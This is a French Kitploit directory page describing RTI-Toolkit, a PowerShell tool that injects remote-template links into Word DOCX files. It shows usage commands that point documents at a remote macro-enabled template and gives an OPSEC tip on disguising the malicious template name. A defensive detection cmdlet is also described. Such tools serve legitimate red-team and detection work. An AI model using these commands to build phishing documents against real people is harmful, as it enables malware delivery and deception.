Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
RTI-Toolkit — Kit PowerShell pour les attaques et la défense par injection de modèles à distance. Injecte des liens malveillants dans des documents Word Office pour le phishing, avec des modules d'identification pour les équipes bleues. | Kitploit
Outils/GitHubGitHub/nickvourd/rti-toolkit
Outils de PhishingHameçonnageTests d'IntrusionRed Teaming
GitHubnickvourd/rti-toolkit

RTI-Toolkit

Kit PowerShell pour les attaques et la défense par injection de modèles à distance. Injecte des liens malveillants dans des documents Word Office pour le phishing, avec des modules d'identification pour les équipes bleues.

Voir le dépôt
559il y a 2 moisVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

RTI-Toolkit

Kit d'injection de modèle distant

Description

RTI-Toolkit est un kit PowerShell open-source pour l'attaque par injection de modèle distant. Ce kit comprend un script PowerShell nommé PS-Templator.ps1 qui peut être utilisé à la fois d'un point de vue offensif et défensif.

Les tableaux suivants présentent les principaux modules (cmdlets) de PS-Templator.ps1 :

CmdletDescriptionPrespective
Invoke-TemplateImplémente des liens de modèle distant dans les modèles Office Word par défautOffensif
Invoke-RegularImplémente des liens de modèle distant dans des documents Office Word classiques sans modèleOffensif
Invoke-IdentifyIdentifie les liens de modèle distant dans les documents Office Word docx avec/sans modèleDéfensif

⚠️ PS-Templator.ps1 ne supporte que les fichiers DOCX.

ℹ️ Cet outil est référencé par le National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD) dans CVE-2025-65318 et CVE-2025-65319.

Version

1.0.0

Licence

Cet outil est sous licence License: MIT.

Remerciements

Un grand merci à mes amis @Papadope9 et Stavros Gkounis (alias purpl3ph03n1x), qui ont fourni une aide précieuse lors de la phase de test bêta de l'outil.

Cet outil a été inspiré lors d'une évaluation iCAST Red Teaming avec @S1ckB0y1337 il y a quelques années.

Supernova a été créé avec ❤️ par @nickvourd.

Table des matières

  • RTI-Toolkit
    • Description
    • Version
    • Licence
    • Remerciements
    • Table des matières
    • Injection de modèle distant (RTI)
    • Installation
    • Cmdlets
      • Invoke-Template
        • Exemple d'Invoke-Template
      • Invoke-Regular
        • Exemple d'Invoke-Regular
        • Exemple 2 d'Invoke-Regular
      • Invoke-Identify
        • Exemple d'Invoke-Identify
        • Exemple 2 d'Invoke-Identify
    • Références

Injection de modèle distant (RTI)

L'injection de modèle distant (RTI) dans le contexte de Microsoft Office fait référence à un type spécifique de vulnérabilité de sécurité qui peut être exploitée via des modèles malveillants dans les documents Office (par exemple, Word, Excel, PowerPoint).

Par exemple, dans un fichier DOCX, le contenu est stocké au format XML dans l'archive, et certains de ces fichiers XML peuvent référencer des ressources ou modèles externes. Les attaquants peuvent effectivement manipuler ces fichiers XML pour insérer des liens ou contenus malveillants qui peuvent potentiellement exploiter des vulnérabilités ou tromper les utilisateurs.

Il s'agit d'une attaque basée sur des macros.

Installation

Pour charger PS-Templator.ps1 en tant que module en mémoire, exécutez la commande suivante :

root@kitploit:~
Import-Module .\PS-Templator.ps1

ℹ️ PS-Templator.ps1 fonctionne sans nécessiter l'installation de dépendances supplémentaires.

ℹ️ PS-Templator.ps1 fonctionne en tant que module PowerShell.

ℹ️ PS-Templator.ps1 testé sur une machine Windows 10 avec Office 2019 Professionnel Plus.

Cmdlets

Invoke-Template

Invoke-Template est un cmdlet qui implémente des liens de modèle distant dans les modèles Office Word par défaut.

Exemple d'Invoke-Template

En supposant que vous ayez un modèle Word par défaut, comme celui-ci :

All Words Templates

Enregistré sous, par exemple, 'Name.docx' :

Default Word Template Document

Si vous utilisez le cmdlet Invoke-Template, vous pouvez insérer un lien malveillant dans ce docx :

⚠️ Avant d'exécuter Invoke-Template, assurez-vous d'enregistrer le document et de le fermer (terminez son processus).

root@kitploit:~
Invoke-Template -InputDoc Name.docx -Link "https://192.168.1.3:8080/Doc1.docm" -Output C:\Users\User\Desktop\LegitDocument.docx

Résultat :

Invoke-Template-1

Comme vous pouvez le voir, le module Invoke-Template conserve une sauvegarde du document original et fournit le chemin complet vers le document malveillant.

D'un point de vue débogage, si vous convertissez le docx malveillant en archive zip et allez dans /word/_rels/settings.xml.rels, vous pouvez voir le lien malveillant :

Invoke-Template-Debug

Invoke-Regular

Invoke-Regular est un cmdlet qui implémente des liens de modèle distant dans des documents Office Word par défaut sans modèles.

Exemple d'Invoke-Regular

En supposant que vous ayez un document Word par défaut sans modèle, comme celui-ci :

Blank Document

Enregistré sous, par exemple, 'Doc1.docx' :

Word Document

Si vous utilisez le cmdlet Invoke-Regular, vous pouvez insérer un lien malveillant dans ce docx :

⚠️ Avant d'exécuter Invoke-Regular, assurez-vous d'enregistrer le document et de le fermer (terminez son processus).

root@kitploit:~
Invoke-Regular -InputDoc C:\Users\User\Desktop\Doc1.docx -Link "http://192.168.1.3:8080/Doc1.docm" -Output Nikos2.docx

Résultat :

Invoke-Regular-1

Comme vous pouvez le voir, le module Invoke-Regular conserve une sauvegarde du document original et fournit le chemin complet vers le document malveillant.

D'un point de vue débogage, si vous convertissez le docx malveillant en archive zip et allez dans /word/_rels/settings.xml.rels, vous pouvez voir le lien malveillant :

Invoke-Regular-Debug-1

Exemple 2 d'Invoke-Regular

D'un point de vue OPSEC, vous pouvez utiliser -TemplateName conjointement avec le module Invoke-Regular. Cela rendra votre document malveillant plus légitime si quelqu'un essaie de l'analyser.

Voici un exemple :

root@kitploit:~
Invoke-Regular -InputDoc C:\Users\User\Desktop\Doc1.docx -Link "http://192.168.1.3:8080/Doc1.docm" -Output Legittemplate.dotx

Résultat :

Invoke-Regular-Example-2

D'un point de vue débogage, si vous convertissez le docx malveillant en archive zip et allez dans /docProps/app.xml, vous pouvez voir le faux nom de modèle :

Invoke-Regular-Fake-Template-Name

Invoke-Identify

Invoke-identify est un cmdlet qui identifie les liens de modèle distant dans les documents Office Word docx avec/sans modèle.

Exemple d'Invoke-Identify

En supposant que vous ayez un document Word malveillant :

root@kitploit:~
Invoke-Identify -InputDoc LegitDocument.docx -Output C:\Users\User\Desktop\output.txt

Résultat :

Invoke-Identify Malicous Example

Exemple 2 d'Invoke-Identify

En supposant que vous ayez un document Word non malveillant :

root@kitploit:~
Invoke-Identify -InputDoc Name.docx -Output C:\Users\User\Desktop\output2.txt

Résultat :

Invoke-Identify Clean Example

Références

  • ired.team
  • dmcxblue.gitbook.io
  • john-woodman.com
  • remoteInjector GitHub par John Woodman
  • Invoke-Templator GitHub par Outflanknl
  • attack.mitre.org
  • BadAssMacros GitHub par Inf0secRabbit
Télécharger l’outil